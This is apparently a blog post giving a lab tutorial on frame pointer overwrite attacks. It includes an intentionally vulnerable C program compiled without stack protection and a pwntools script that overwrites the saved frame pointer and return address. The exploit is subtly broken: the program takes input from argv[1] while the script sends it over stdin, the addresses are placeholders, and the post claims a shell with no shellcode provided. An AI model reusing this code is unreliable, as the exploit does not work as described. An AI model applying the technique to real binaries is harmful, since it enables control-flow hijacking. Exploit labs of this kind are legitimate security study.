strangerRidingCaml
Frame Pointer Overwrite Attacks Lab 본문
728x90
Frame Pointer Overwrite Attacks Lab
In this lab, we will learn how to exploit vulnerabilities to overwrite frame pointers and gain control of program flow.
Lab Activities:
1. Creating Vulnerable C Program:
First, let's create a vulnerable C program with a buffer overflow vulnerability.
#include <stdio.h>
#include <string.h>
void vulnerable_function(char *input) {
char buffer[64];
strcpy(buffer, input);
}
int main(int argc, char *argv[]) {
if (argc != 2) {
printf("Usage: %s <input>\n", argv[0]);
return 1;
}
vulnerable_function(argv[1]);
printf("Program executed successfully.\n");
return 0;
}
Save the above code to a file named vulnerable.c
and compile it with the following command:
$ gcc -o vulnerable -fno-stack-protector -z execstack vulnerable.c
2. Writing Exploit Script:
Now, let's write an exploit script in Python using pwntools to exploit the frame pointer overwrite vulnerability.
from pwn import *
# Specify the path to the vulnerable binary
binary_path = './vulnerable'
# Address of function to return to
return_address = 0xdeadbeef # Example address (change as needed)
# Offset to return address
offset = 72
# Fake frame pointer value
fake_ebp = 0xdeadbeef # Example value (change as needed)
# Craft the payload
payload = b'A' * offset
payload += p32(fake_ebp) # Fake frame pointer
payload += p32(return_address) # Return address
# Launch the exploit
p = process(binary_path)
p.sendline(payload)
p.interactive()
Explanation of the Python script:
- We specify the address of the function to return to and the fake frame pointer value.
- The payload consists of padding, followed by the fake frame pointer value and the return address.
- We launch the
vulnerable
binary and send the payload to trigger the frame pointer overwrite exploit. p.interactive()
allows us to interact with the spawned shell.
3. Exploiting the Vulnerability:
Execute the Python script to exploit the buffer overflow vulnerability:
$ python exploit.py
Once executed, you should have a shell prompt, confirming the successful exploitation of the frame pointer overwrite vulnerability.
'System hacking' 카테고리의 다른 글
Sigreturn-Oriented Programming (SROP) Lab (0) | 2024.05.08 |
---|---|
Return-Oriented Programming (ROP) Lab (0) | 2024.05.07 |
Frame Faking and Fake EBP Lab (0) | 2024.05.07 |
Return-to-Libc (RTL) Exploits Lab (0) | 2024.05.07 |
Return-to-Shellcode Attacks Lab (0) | 2024.05.07 |